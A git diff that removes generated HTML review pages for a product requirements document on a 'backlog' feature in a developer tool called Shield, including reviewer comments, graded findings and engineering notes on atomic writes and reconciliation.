-<h2 id="3-problem--context">3. Problem &amp; context</h2>
-<p>Future work surfaces constantly while using Shield — during <code>/research</code>, while writing a PRD, mid-<code>/plan</code>, and especially during <code>/implement</code> (&quot;we should also handle X later&quot;, &quot;this whole area needs a rewrite&quot;). Today there is <strong>nowhere to park that work</strong>. The options are bad: derail the current task to chase it, or drop it in a comment / memory / someone's head and lose it.</p>
-<!-- [P1 from: PM] 1d — These quoted phrases are illustrative, not cited user-research artifacts. Cite a real transcript/session log, or link the (currently null) research doc. -->
-<p>Concretely:</p>
-<ul>
-<li>There is no project-level, ordered place to capture &quot;not now, but later&quot; items. <code>plan.json</code> only holds work already committed to a milestone; <code>manifest.json</code> is an artifact index. Neither captures un-triaged future work.</li>
-<li>Ideas discovered by the agent mid-task have no home — they're mentioned once in conversation and gone.</li>
-<li>When future work <em>is</em> remembered, there's no consistent path from &quot;loose idea&quot; to &quot;stories in a plan.&quot; Each pickup re-derives the epic, the feature, and the scope from scratch.</li>
-</ul>
-<!-- [P1 from: PM] 1b — No baseline numbers. Add one concrete figure, e.g. "~N follow-up items surfaced and lost across the last M /implement runs", to size the problem. -->
-<p>Why now: Shield's pipeline (<code>/research → /prd → /plan → /implement</code>) is mature, but it only handles work that's <em>already</em> been decided on. The gap is the staging area <em>before</em> that pipeline — where future work waits, ordered, until the user promotes it in.</p>
-<!-- [P1 from: PM] 11a/11b — Why-now describes a standing capability gap, not a concrete trigger; cost-of-inaction is unquantified. Anchor to a recent specific instance of lost follow-up work, and quantify (items dropped per cycle, or hours re-deriving scope). -->
-<h2 id="4-target-users--personas">4. Target users / personas</h2>
-<table>
-<thead>
-<tr>
-<th>ID</th>
-<th>Persona</th>
-<th>Goals</th>
-<th>Frictions today</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P1</td>
-<td>Developer/PM driving Shield</td>
-<td>Capture future work without losing focus on the current task; come back later to an ordered list of what to pick up next</td>
-<td>Future ideas get lost or derail the current task; no ordered &quot;later&quot; list at the project level</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>The agent (Claude) running a Shield task</td>
-<td>Record follow-up work it discovers mid-task so the human doesn't have to remember it</td>
-<td>Discovered work is mentioned once in chat then forgotten; no place to persist it</td>
-</tr>
-</tbody>
-</table>
-<!-- [P1 from: PM] 1a — Personas are role categories, not a named persona. Name P1 concretely (e.g. "Ashwini, Shield maintainer running /implement daily"). -->
-<h2 id="5-architecture--flows">5. Architecture &amp; flows</h2>
-<p>A single global store <code>docs/shield/backlog.json</code> (sibling to <code>manifest.json</code>), a <code>/backlog</code> command to view it, a capture path usable from any Shield skill or by the user, and a <strong>user-driven promotion</strong>: the user picks an entry and starts whichever Shield step fits — <code>/research</code>, <code>/prd</code>, <code>/plan</code>, or <code>/implement</code>. Each entry carries an order, a source (<code>user</code> | <code>agent</code>), and a <strong>feature + epic association</strong>. <strong>Reconciliation</strong> reads <code>manifest.json</code> as the project-level index — to find each entry's feature, see whether it has a <code>plan.json</code>, and surface its pipeline status (research/prd/plan) in the <code>/backlog</code> view — then opens the flagged <code>plan.json</code> and removes any entry whose epic's work now appears there. A <code>prd</code>-only feature stays in the backlog; only plan-committed work is removed. No ids are tracked.</p>
-<!-- [P1 from: DX] Capture-from-skill interface is undefined — M1 requires capture "usable from any Shield skill" but no command/helper/write-contract is given. Specify the capture entrypoint. -->
-<!-- [INFO from: Tech-lead] NFR notes to fold into /plan: (1) atomic write for backlog.json (temp-then-rename) + concurrent capture-vs-reconcile is the primary failure case; (2) add schema_version for forward migration; (3) reconciliation no-ops (never removes) on missing/old manifest.json or plan.json rather than erroring; (4) backlog.json is git-tracked, so bad removals are git-revertable — consider dry-run/confirm before reconcile removals. -->
-<pre class="mermaid">flowchart LR
-  cap[&quot;Capture&lt;br/&gt;(user or agent, anytime)&quot;] --&gt; bl[&quot;backlog.json&lt;br/&gt;(ordered, project-level)&quot;]
-  bl --&gt; view[&quot;/backlog&lt;br/&gt;(ordered list +&lt;br/&gt;per-entry pipeline status)&quot;]
-  man[&quot;manifest.json&lt;br/&gt;(feature index:&lt;br/&gt;research/prd/plan)&quot;] --&gt; view
-  bl --&gt; dec{&quot;User decides&lt;br/&gt;next step&quot;}
-  dec --&gt; research[&quot;/research&quot;]
-  dec --&gt; prd[&quot;/prd&quot;]
-  dec --&gt; plan[&quot;/plan&quot;]
-  dec --&gt; impl[&quot;/implement&quot;]
-  man --&gt; rec[&quot;Reconcile:&lt;br/&gt;epic&#x27;s work in feature&#x27;s plan.json&lt;br/&gt;→ remove from backlog&quot;]
-  plan --&gt; rec
-  rec --&gt; bl
-</pre>
-<h2 id="6-goals--non-goals">6. Goals &amp; non-goals</h2>
-<h3 id="goals">Goals</h3>
-<ul>
-<li>Capture future work (epic / story / task granularity) at <strong>any point</strong> in the workflow — before a PRD exists, during planning, during implementation — without derailing the current task.</li>
-<li>Support <strong>both</strong> capture sources: user-created and agent-discovered.</li>
-<li>Keep the backlog <strong>ordered</strong> so there's a clear &quot;what to pick up next.&quot;</li>
-<li>Every entry is <strong>associated with a feature and an epic</strong> — existing or proposed-new — and the agent <strong>suggests a matching feature/epic</strong> at capture or promotion time.</li>
-<li>A <code>/backlog</code> command <strong>shows the current backlog</strong>, ordered, with each entry's feature + epic association, source, and <strong>pipeline status (research / prd / plan, read from <code>manifest.json</code>)</strong> — so you can see what's been started (e.g. a prd written) without the entry being removed.</li>
-<li>Provide a <strong>user-driven promotion path</strong>: the user picks an entry and starts the Shield step they judge appropriate (<code>/research</code>, <code>/prd</code>, <code>/plan</code>, or <code>/implement</code>). The backlog suggests, but does not dictate, the next step.</li>
-<li><strong>Keep the backlog current</strong>: when an entry's work appears in a feature's <code>plan.json</code>, the entry is removed automatically, so the backlog reflects only not-yet-planned work.</li>
-</ul>
-<!-- [P2 from: DX] "removed automatically" contradicts the on-/backlog-view reconciliation described in §2/§5/§9 and the §6 non-goal disclaiming automatic surfacing machinery. Replace with "removed on next /backlog view". -->
-<h3 id="non-goals">Non-goals</h3>
-<ul>
-<li><strong>Automatic end-of-task surfacing machinery</strong> (hooks). The agent already calls out new entries conversationally; no dedicated surfacing mechanism in v1.</li>
-<li><strong>Per-feature backlogs.</strong> v1 is a single global backlog.</li>
-<li><strong>A status/workflow engine.</strong> The lifecycle is minimal: an entry exists in the backlog until its work lands in a <code>plan.json</code>, at which point it is removed. No multi-state machine.</li>
-<li><strong>Syncing the backlog to the PM tool</strong> (ClickUp/Jira/etc.). The backlog is a pre-pipeline staging area; PM sync happens after promotion, via the existing <code>/pm-sync</code> on the resulting plan.</li>
-<li><strong>Replacing the PM tool's own backlog.</strong> This is Shield-local triage, not a project-management backlog of record.</li>
-</ul>
-<!-- [P2 from: PM] 2c — Add a scope-creep guard: name the most probable creep ask (e.g. a rejected/dropped state, or ClickUp sync) and state that @ashwinimanoj gates any v1 expansion. -->
-<h2 id="7-success-metrics">7. Success metrics</h2>
-<table>
-<thead>
-<tr>
-<th>Metric</th>
-<th>Type</th>
-<th>Target</th>
-<th>Counter</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Captured entries that get acted on (work started, or removed once it lands in a plan) vs. left to rot</td>
-<td>Outcome</td>
-<td>Majority of entries reach a terminal state (promoted/landed in a plan, or explicitly dropped) rather than rotting</td>
-<td>Entries pile up un-triaged → backlog becomes a graveyard</td>
-</tr>
-<tr>
-<td>Entries carrying a feature + epic association at promotion time</td>
-<td>Quality</td>
-<td>100% — promotion cannot complete without a feature and epic</td>
-<td>Forcing association makes capture so heavy nobody captures</td>
-</tr>
-<tr>
-<td>Agent feature/epic-suggestion acceptance</td>
-<td>Quality</td>
-<td>Suggested feature/epic accepted often enough to save manual lookup</td>
-<td>Bad suggestions that users routinely override</td>
-</tr>
-<tr>
-<td>Capture friction</td>
-<td>Adoption</td>
-<td>Capturing an entry mid-task takes one step and does not interrupt the current task</td>
-<td>Capture is so quick the backlog fills with low-signal noise</td>
-</tr>
-</tbody>
-</table>
-<!-- [P1 from: PM/DX] 3a — Three of four targets are vague ("Majority", "often enough", "one step"). Attach numbers + a time horizon, e.g. ">=70% of entries reach a terminal state within 30 days", ">=60% suggestion-acceptance". -->
-<!-- [P1 from: PM] 3d — Name a tracking owner/method: there is no dashboard or cadence, and reconciliation deletes entries (no source of truth for "terminal state"). Measure via periodic /backlog audit or git history of backlog.json. -->
-<h2 id="8-milestones">8. Milestones</h2>
-<table>
-<thead>
-<tr>
-<th>ID</th>
-<th>Name</th>
-<th>Outcome</th>
-<th>Exit criteria</th>
-<th>Depends on</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>M1</td>
-<td>Capture + store + view</td>
-<td>A global <code>backlog.json</code> exists; entries can be added (user + agent) with order, source, and feature + epic association; <code>/backlog</code> shows the ordered list with per-entry pipeline status from <code>manifest.json</code></td>
-<td><code>backlog.json</code> schema defined; an entry can be captured from a skill or by the user; <code>/backlog</code> renders the ordered backlog with feature + epic and a research/prd/plan status read from <code>manifest.json</code></td>
-<td>—</td>
-</tr>
-<tr>
-<td>M2</td>
-<td>Feature + epic association + suggestion</td>
-<td>Every entry references a feature and an epic (existing or proposed new); the agent suggests a matching feature/epic</td>
-<td>Capture prompts for a feature + epic; agent scans <code>manifest.json</code> features and known epics and proposes a match; user can accept, pick another, or create-new</td>
-<td>M1</td>
-</tr>
-<tr>
-<td>M3</td>
-<td>Promotion + reconciliation</td>
-<td>The user picks an entry and starts the Shield step they choose (<code>/research</code>, <code>/prd</code>, <code>/plan</code>, or <code>/implement</code>); once the entry's epic's work appears in the feature's <code>plan.json</code>, it is removed from the backlog</td>
-<td>Reconciliation uses <code>manifest.json</code> (find feature, has-plan?) + <code>plan.json</code> (epic present?) — no ids stamped; a <code>prd</code>-only feature is <strong>not</strong> removed; <code>/backlog</code> reconciles on view; the user-chosen step is never overridden</td>
-<td>M2</td>
-</tr>
-</tbody>
-</table>
-<!-- [P1 from: DX] M3 exit criteria asserts "/backlog reconciles on view" as settled, but §9 still lists the reconciliation trigger as OPEN. Resolve §9 or soften M3 — a developer can't implement against an unsettled trigger. -->
-<!-- [P1 from: Agile-coach] 4a/4e — Exit criteria are happy-path only and a few are thresholdless ("agent suggests a matching feature/epic"). Tighten to verifiable conditions and add ≥1 error path per flow (missing plan.json, abandoned capture, concurrent write). -->
-<h2 id="9-open-questions">9. Open questions</h2>
-<!-- [P0 from: PM] 12a (Risks & assumptions) — There is NO risks section anywhere. Add a lean risks table (risk + mitigation + named owner) and an assumptions list (validated vs unvalidated). The key unvalidated assumption: "agents reliably surface follow-ups conversationally" — the entire no-hooks non-goal rests on it. Mitigations mostly exist already (reconciliation-on-view → graveyard; atomic write → corruption). This is the single P0 blocking /plan. -->
-<ul>
-<li><strong>Feature/epic discovery scope.</strong> <code>manifest.json</code> lists features (the reconciliation key). Epics still live inside per-feature <code>plan.json</code> files, so confirming an entry's epic means opening the plan the manifest flags as having one. (Leaning: manifest as the index, open only flagged <code>plan.json</code> files; revisit if a project-level epic index is ever needed.)</li>
-<li><strong>Reconciliation matching (resolved):</strong> no ids are stamped. An entry references a <strong>feature</strong> (matched against <code>manifest.json</code>) and an <strong>epic</strong> (confirmed in that feature's <code>plan.json</code>). The entry is removed only once its epic's work appears in the plan — a <code>prd</code>-only feature is <strong>not</strong> removed. Open: does reconciliation run on <code>/backlog</code> view, at the end of <code>/plan</code>, or both? (Leaning: on <code>/backlog</code> view, since the user drives promotion.)</li>
-</ul>
-<!-- [P1 from: DX] This "(resolved)" still leaves the proposed-new-epic → real-epic match key undefined (string match vs user-confirmed). And the trailing "Open: ..." trigger contradicts M3 (line above). Settle both. -->
-<ul>
-<li><strong>Ordering scheme.</strong> Single global rank (explicit integer order, like <code>orderindex</code>), priority buckets (P0/P1/P2), or both? (Leaning: explicit order field for v1.)</li>
-<li><strong>Entry granularity.</strong> The ask says &quot;epics/stories/tasks.&quot; Do we model a <code>kind</code> field, or treat every entry uniformly as &quot;future work that becomes ≥1 story on promotion&quot;? (Leaning: a <code>kind</code> hint, but promotion always yields stories.)</li>
-<li><strong>Dropped/rejected entries.</strong> Do we need an explicit terminal state for &quot;decided against,&quot; or is deleting the entry enough? (Deferred — see Out of scope.)</li>
-</ul>
-<!-- [P2 from: PM] 12c — Promote the resolved/settled open questions into a short decision log (alternative considered + why set aside) so the dissenting view survives. -->
-<h2 id="10-out-of-scope--non-goals">10. Out of scope / Non-goals</h2>
-<ul>
-<li>Automatic end-of-task surfacing via hooks (the agent calls it out conversationally; revisit if that proves unreliable).</li>
-<li>Per-feature backlogs and a global↔per-feature promotion path.</li>
-<li>A <code>rejected</code>/<code>dropped</code> lifecycle state and the audit trail for declined ideas.</li>
-<li><code>/pm-sync</code> of backlog entries to the PM tool before promotion.</li>
-<li>Cross-project / multi-repo backlogs.</li>
-<li>Reordering UX beyond editing the order field (no drag-and-drop, no auto-prioritization).</li>
-</ul>
-<!-- [P2 from: PM] 2b — Several items here are bare. Add a one-line why-deferred to each (e.g. "Per-feature backlogs — prove the single global store in v1 first; split only if features grow large"). -->
-<hr />
-<blockquote>
-<p><strong>This is a lean PRD.</strong> It intentionally omits the following standard sections:</p>
-<ul>
-<li>Section 8 — User stories &amp; scenarios</li>
-<li>Section 9 — Functional requirements</li>
-<li>Section 10 — Non-functional requirements</li>
-<li>Section 11 — RBAC &amp; permissions matrix</li>
-<li>Section 12 — Dependencies</li>
-<li>Section 13 — Risks &amp; mitigations</li>
-<li>Section 14 — Assumptions</li>
-<li>Section 15 — Rollout plan (full — lean has its own §8 Milestones)</li>
-<li>Section 16 — Cost &amp; resource impact</li>
-<li>Section 17 — GTM &amp; customer-comms</li>
-<li>Section 18 — Support / CX impact</li>
-</ul>
-<p>If scope grows or stakeholders need more detail, run <code>/prd</code> again — Shield
-will offer to add specific sections or upgrade to <code>standard</code>.</p>
-</blockquote>
-<!-- [Reviewer note] The lean footer omits §13 Risks and §14 Assumptions, but the PRD-Review rubric grades dim 12 (Risks & assumptions) even for lean PRDs — hence the P0 above. A lean risks/assumptions treatment (a few lines) satisfies it without upgrading to standard. -->
-
-</body>
-</html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/summary.html b/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/summary.html
deleted file mode 100644
index fdaf2b5a..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/summary.html
+++ /dev/null
@@ -1,241 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8" />
-<meta name="viewport" content="width=device-width, initial-scale=1.0" />
-<title>Review — backlog-20260527</title>
-<link rel="stylesheet" href="../../../../../shield.css" />
-<script defer src="../../../../../manifest.js"></script>
-<script defer src="../../../../../shield-nav.js"></script>
-<script type="module">
-  import mermaid from "https://cdn.jsdelivr.net/npm/mermaid@10/dist/mermaid.esm.min.mjs";
-  mermaid.initialize({ startOnLoad: false, theme: "default" });
-  document.addEventListener("DOMContentLoaded", () => mermaid.run({ querySelector: "pre.mermaid" }));
-</script>
-</head>
-<body data-shield-root="../../../../../">
-<header class="shield-header">
-  <a class="brand" href="../../../../../index.html">🛡 Shield</a>
-  <span class="bar-sep">|</span>
-  <nav class="crumb" id="shield-crumb"></nav>
-  <span class="bar-spacer"></span>
-  <div class="feat-wrap">
-    <button class="feat-btn" id="docs-toggle" aria-expanded="false">Features ▾</button>
-    <div class="feat-panel" id="docs-panel">
-      <input class="docs-search" id="docs-search" placeholder="Search docs…  (⌘K)" autocomplete="off" />
-      <div id="docs-results"></div>
-    </div>
-  </div>
-</header>
-<main class="shield-main">
-
-<nav class="toc">
-<div class="toc-title">Contents</div>
-<ul>
-<li><a href="#verdict-needs-work-composite-27-blocked-by-1-p0">Verdict: Needs Work (composite 2.7, blocked by 1 P0)</a>
-<ul>
-<li><a href="#per-dimension-grades">Per-dimension grades</a></li>
-</ul>
-</li>
-<li><a href="#p0--must-fix-before-plan-1">P0 — must fix before /plan (1)</a>
-</li>
-<li><a href="#p1--should-fix-for-quality-8">P1 — should fix for quality (8)</a>
-</li>
-<li><a href="#p2--nice-to-have-4">P2 — nice to have (4)</a>
-</li>
-<li><a href="#dx-anti-patterns-cross-cutting">DX anti-patterns (cross-cutting)</a>
-</li>
-<li><a href="#tech-lead-nfr-notes-informational-lean-exempt--but-real">Tech-lead NFR notes (informational, lean-exempt — but real)</a>
-</li>
-<li><a href="#recommended-next-steps">Recommended next steps</a>
-</li>
-</ul>
-</nav>
-<h1 id="prd-review--shield-backlog">PRD Review — Shield Backlog</h1>
-<p><strong>Source:</strong> <code>docs/shield/backlog-20260527/prd.md</code> (snapshot: <code>source-prd.md</code>)<br />
-<strong>PRD type:</strong> Lean (confirmed) · <strong>Date:</strong> 2026-05-27 · <strong>Reviewers:</strong> 13 dispatches (9 PM dims + agile-coach + tech-lead + dx-engineer + finops-analyst)</p>
-<h2 id="verdict-needs-work-composite-27-blocked-by-1-p0">Verdict: <strong>Needs Work</strong> (composite 2.7, blocked by 1 P0)</h2>
-<p>Strong, well-scoped lean PRD with an unusually clean conceptual model (manifest = reconciliation key, epic = removal gate, no ids). It's held back by one Critical gap (no risks/assumptions treatment) and a cluster of consistency issues — several introduced by the recent rapid edits (the reconciliation trigger and &quot;automatically&quot; wording).</p>
-<table>
-<thead>
-<tr>
-<th>Persona</th>
-<th>Weight</th>
-<th>Grade</th>
-<th>Notes</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>product-manager (dims 1,2,3,7,8,11,12)</td>
-<td>1.0</td>
-<td><strong>C (2.17)</strong></td>
-<td>dim 1 &amp; 12 drag it down</td>
-</tr>
-<tr>
-<td>agile-coach (dim 4)</td>
-<td>1.0</td>
-<td><strong>B (3.0)</strong></td>
-<td>happy-path-only coverage</td>
-</tr>
-<tr>
-<td>tech-lead (dims 5,6)</td>
-<td>1.0</td>
-<td><strong>Informational</strong></td>
-<td>lean-exempt (real NFR notes below)</td>
-</tr>
-<tr>
-<td>dx-engineer (anti-patterns)</td>
-<td>0.7</td>
-<td><strong>B (3.0)</strong></td>
-<td>found edit-induced contradictions</td>
-</tr>
-<tr>
-<td>finops-analyst (dim 13)</td>
-<td>0.7</td>
-<td><strong>N/A</strong></td>
-<td>internal tool, no cost surface</td>
-</tr>
-<tr>
-<td><strong>Composite</strong></td>
-<td></td>
-<td><strong>2.69</strong></td>
-<td>≥2.5 but P0-gated → Needs Work</td>
-</tr>
-</tbody>
-</table>
-<h3 id="per-dimension-grades">Per-dimension grades</h3>
-<table>
-<thead>
-<tr>
-<th>Dim</th>
-<th>Name</th>
-<th>Grade</th>
-<th></th>
-<th>Dim</th>
-<th>Name</th>
-<th>Grade</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>1</td>
-<td>Problem clarity</td>
-<td><strong>D</strong></td>
-<td></td>
-<td>8</td>
-<td>Legal/privacy</td>
-<td>N/A</td>
-</tr>
-<tr>
-<td>2</td>
-<td>Scope boundaries</td>
-<td>B</td>
-<td></td>
-<td>9</td>
-<td>GTM</td>
-<td>informational</td>
-</tr>
-<tr>
-<td>3</td>
-<td>Measurable success</td>
-<td>C</td>
-<td></td>
-<td>10</td>
-<td>Support/CX</td>
-<td>informational</td>
-</tr>
-<tr>
-<td>4</td>
-<td>Scenario coverage &amp; AC</td>
-<td>B</td>
-<td></td>
-<td>11</td>
-<td>Why now</td>
-<td>C</td>
-</tr>
-<tr>
-<td>5</td>
-<td>NFR coverage</td>
-<td>informational</td>
-<td></td>
-<td>12</td>
-<td>Risks &amp; assumptions</td>
-<td><strong>D</strong></td>
-</tr>
-<tr>
-<td>6</td>
-<td>Rollout &amp; ops</td>
-<td>informational</td>
-<td></td>
-<td>13</td>
-<td>Cost</td>
-<td>informational</td>
-</tr>
-<tr>
-<td>7</td>
-<td>RACI &amp; approvals</td>
-<td>A</td>
-<td></td>
-<td></td>
-<td></td>
-<td></td>
-</tr>
-</tbody>
-</table>
-<hr />
-<h2 id="p0--must-fix-before-plan-1">P0 — must fix before <code>/plan</code> (1)</h2>
-<p><strong>P0-1 · Dim 12a · Risks &amp; assumptions (Critical, F).</strong> No risks section: failure modes appear only as §7 counter-metrics, with no mitigations or named owners, and no validated/unvalidated assumptions framing.
-→ <em>Add a short lean risks table — each risk + mitigation + owner — and an assumptions list. The load-bearing unvalidated assumption is the whole no-hooks bet: &quot;agents reliably surface follow-ups conversationally.&quot; Mitigations mostly already exist (reconciliation-on-view → graveyard risk; atomic write → corruption).</em></p>
-<h2 id="p1--should-fix-for-quality-8">P1 — should fix for quality (8)</h2>
-<ul>
-<li><strong>P1-1 · Dim 1b (Important, F).</strong> Problem stated with zero baseline numbers. → Add one figure, e.g. &quot;~N follow-ups lost across the last M <code>/implement</code> runs.&quot;</li>
-<li><strong>P1-2 · Dim 1a (Critical, C).</strong> Personas are role categories, not a named persona. → Name P1 concretely (e.g. &quot;Ashwini, Shield maintainer running <code>/implement</code> daily&quot;).</li>
-<li><strong>P1-3 · Dim 3a (Critical, C).</strong> Three of four metrics use vague targets (&quot;Majority&quot;, &quot;often enough&quot;, &quot;one step&quot;). → Attach numbers + a time horizon (e.g. &quot;≥70% reach a terminal state within 30 days&quot;).</li>
-<li><strong>P1-4 · Dim 3d (Warning, F).</strong> No tracking owner/cadence for the metrics. → Name how it's measured (e.g. periodic <code>/backlog</code> audit, or git history of <code>backlog.json</code>).</li>
-<li><strong>P1-5 · Dim 11a/11b (Critical/Important, C).</strong> Why-now describes a standing gap, not a concrete trigger; cost-of-inaction unquantified. → Anchor to a real recent instance of lost follow-up work.</li>
-<li><strong>P1-6 · Dim 12b (Important, D).</strong> No validated-vs-unvalidated assumptions split. → See P0-1 fix.</li>
-<li><strong>P1-7 · Dim 4a (Critical, C) + 4b (Important, C).</strong> Flows are happy-path only; edge cases (missing <code>plan.json</code>, abandoned capture, concurrent writes to the single global <code>backlog.json</code>, two features sharing an epic id) are unaddressed. → Add ≥1 error path per core flow; resolve the ordering-collision open question.</li>
-<li><strong>P1-8 · DX / matching rule (P1).</strong> With ids removed, the PRD never says <strong>how a proposed-new epic name is matched to the eventual real epic in <code>plan.json</code></strong> — this is the central removal-correctness decision and is left implicit. → Specify the match key (string match? user-confirmed at promotion?).</li>
-</ul>
-<h2 id="p2--nice-to-have-4">P2 — nice to have (4)</h2>
-<ul>
-<li><strong>Dim 2b (Critical, B).</strong> Several §10 out-of-scope items are bare; add a one-line why-deferred to each.</li>
-<li><strong>Dim 2c (Warning, F).</strong> No scope-creep guard naming the likely creep ask + decision authority (@ashwinimanoj).</li>
-<li><strong>Dim 7c (Important, B).</strong> Sign-off N/A names no confirmer → &quot;N/A — internal tooling (confirmed by @ashwinimanoj)&quot;.</li>
-<li><strong>Dim 12c (Warning, B).</strong> Promote resolved §9 open questions into a short decision log.</li>
-</ul>
-<hr />
-<h2 id="dx-anti-patterns-cross-cutting">DX anti-patterns (cross-cutting)</h2>
-<p>Two of these were introduced by the recent edits — worth fixing before <code>/plan</code>:</p>
-<ol>
-<li><strong>(P1) M3 vs §9 contradiction.</strong> §8 M3 states &quot;<code>/backlog</code> reconciles on view&quot; as settled, but §9 still lists the reconciliation trigger as <strong>Open</strong> (&quot;on view / end of <code>/plan</code> / both&quot;). A developer can't implement M3 against an unsettled trigger. → Resolve §9 or soften M3.</li>
-<li><strong>(P2) &quot;removed automatically&quot; vs user-triggered.</strong> §6 says entries are &quot;removed <strong>automatically</strong>,&quot; but reconciliation runs on <code>/backlog</code> view (a user action) — and §6's own non-goal disclaims &quot;automatic surfacing machinery.&quot; → Replace &quot;automatically&quot; with &quot;on next <code>/backlog</code> view.&quot;</li>
-<li><strong>(P1) <code>kind</code> field undefined but assumed settled.</strong> §6 + M1 commit to &quot;epic/story/task granularity&quot; and M1 says &quot;schema defined,&quot; yet §9 leaves the backing <code>kind</code> field open. → Decide <code>kind</code> before M1.</li>
-<li><strong>(P1) Capture-from-skill interface undefined.</strong> M1 requires capture &quot;usable from any Shield skill&quot; but no command/helper/write-contract is specified. → Define the capture entrypoint.</li>
-<li><strong>(P1) Reconciliation match key</strong> — see P1-8.</li>
-<li><strong>(P1) Unfalsifiable metrics</strong> — see P1-3.</li>
-</ol>
-<p><strong>Clarity strengths (keep):</strong> problem-first ordering; the feature=key / epic=gate distinction is load-bearing and well-defined; non-goals are thorough with rationale; lean exemptions are explicit and correct.</p>
-<h2 id="tech-lead-nfr-notes-informational-lean-exempt--but-real">Tech-lead NFR notes (informational, lean-exempt — but real)</h2>
-<p>Not gating, but cheap to fold in now since the plan will need them:</p>
-<ul>
-<li><strong>Atomic write + concurrency</strong> for <code>backlog.json</code> (write-temp-then-rename; concurrent capture vs reconcile-rewrite is the primary failure case).</li>
-<li><strong>Schema versioning</strong> — add <code>schema_version</code> so the open §9 shape decisions (ordering, <code>kind</code>) can evolve via read-old/write-new.</li>
-<li><strong>Read-contract drift</strong> — reconciliation should no-op (never remove) if <code>manifest.json</code>/<code>plan.json</code> are missing or an older shape, not error.</li>
-<li><strong>Recovery posture</strong> — <code>backlog.json</code> is git-tracked, so a bad reconciliation is <code>git revert</code>-able; consider a dry-run/confirm before reconcile removals in v1.</li>
-</ul>
-<hr />
-<h2 id="recommended-next-steps">Recommended next steps</h2>
-<ol>
-<li>Fix <strong>P0-1</strong> (risks/assumptions) and the two edit-induced contradictions (#1, #2) — all small.</li>
-<li>Resolve the three M1-gating open questions (<code>kind</code>, ordering, reconciliation trigger) or mark them deferred-with-default.</li>
-<li>Specify the <strong>epic match key</strong> (P1-8) — it's the correctness heart of reconciliation.</li>
-<li>Re-run <code>/prd-review</code> or proceed to <code>/plan</code> once P0 is cleared.</li>
-</ol>
-<p><em>Files: <code>summary.md</code> (this), <code>enhanced-prd.md</code> (annotated), <code>review-comments.json</code>, <code>detailed/*.md</code> ×5.</em></p>
-
-</main>
-<footer class="shield-footer">Generated by Shield</footer>
-</body>
-</html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/enhanced-prd.html b/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/enhanced-prd.html
deleted file mode 100644
index c1857896..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/enhanced-prd.html
+++ /dev/null
@@ -1,364 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="utf-8">
-<meta name="viewport" content="width=device-width, initial-scale=1">
-<title>Shield PRD Review</title>
-<style>
-  body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
-  h1,h2,h3{line-height:1.25;margin-top:1.6em}
-  h1{border-bottom:2px solid #e1e4e8;padding-bottom:.3em}
-  h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
-  code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em}
-  pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto}
-  pre code{background:none;padding:0}
-  table{border-collapse:collapse;width:100%;margin:1em 0}
-  th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top}
-  th{background:#f6f8fa}
-  blockquote{border-left:4px solid #d0d7de;margin:1em 0;padding:.2em 1em;color:#57606a}
-  .meta{background:#fff8e6;border:1px solid #f0d999;border-radius:8px;padding:.6em 1em;font-size:.9em;color:#6a5500}
-</style>
-</head>
-<body>
-<div class="meta">Shield PRD Review · feature <code>backlog-20260527</code> · 2026-05-27 · rendered from markdown (source of truth in <code>reviews/prd/2026-05-27/</code>)</div>
-<h1 id="shield-backlog">Shield Backlog</h1>
-<!--
-  PRD-Review enhanced copy — 2026-05-27 (run _2). Verdict: Ready (composite 3.1, 0 P0).
-  Source is unchanged; remaining items are listed here with line refs (table/mermaid splicing avoided).
-
-  P1 (§2, ~line 23): "the entry is removed only when this epic's work appears in plan.json" contradicts the
-      manual-remove trigger (§5/§6/§9) — change "only when" to "when", or add "(or removed manually)".
-  P1 (§5 / §8 M1, ~lines 47/97): capture "usable from any Shield skill" — the capture interface
-      (command/helper name + entry fields) is undefined; define at/before /plan.
-  P1 (§3 / §10, ~line 127): problem baseline unquantified (honestly logged as unvalidated) —
-      add one real figure from past /implement transcripts to harden why-now.
-
-  P2 (§5 / §9, ~lines 47/104): the "transient promotion reference" mechanism is prose-only — pin how
-      /plan and /implement receive and act on it in /plan or the TRD.
-  P2 (§6, ~line 74): state that eager-prune and the /backlog sweep are idempotent (remove-if-present).
-  P2 (§6/§11): add a scope-creep guard naming the likely ask + @ashwinimanoj as accept authority.
-  P2 (§1): sign-off N/A → "N/A — internal tooling, confirmed by @ashwinimanoj".
-
-  TRD inputs (tech-lead, informational/lean-exempt but carry forward): add backlog.json schema_version +
-      migration policy; reconciliation treats unknown manifest.json/plan.json shapes as doubt→entry-stays;
-      state a /backlog sweep perf budget; name a rollback-to-manual-only trigger.
--->
-<h2 id="1-header">1. Header</h2>
-<table>
-<thead>
-<tr>
-<th>Field</th>
-<th>Value</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Owner</td>
-<td>@ashwinimanoj</td>
-</tr>
-<tr>
-<td>Status</td>
-<td>Draft</td>
-</tr>
-<tr>
-<td>PRD type</td>
-<td>Lean</td>
-</tr>
-<tr>
-<td>Date created</td>
-<td>2026-05-27</td>
-</tr>
-<tr>
-<td>Last updated</td>
-<td>2026-05-27</td>
-</tr>
-<tr>
-<td>Linked design spec</td>
-<td>null</td>
-</tr>
-<tr>
-<td>Linked research</td>
-<td>null</td>
-</tr>
-<tr>
-<td>Decision-maker</td>
-<td>@ashwinimanoj</td>
-</tr>
-<tr>
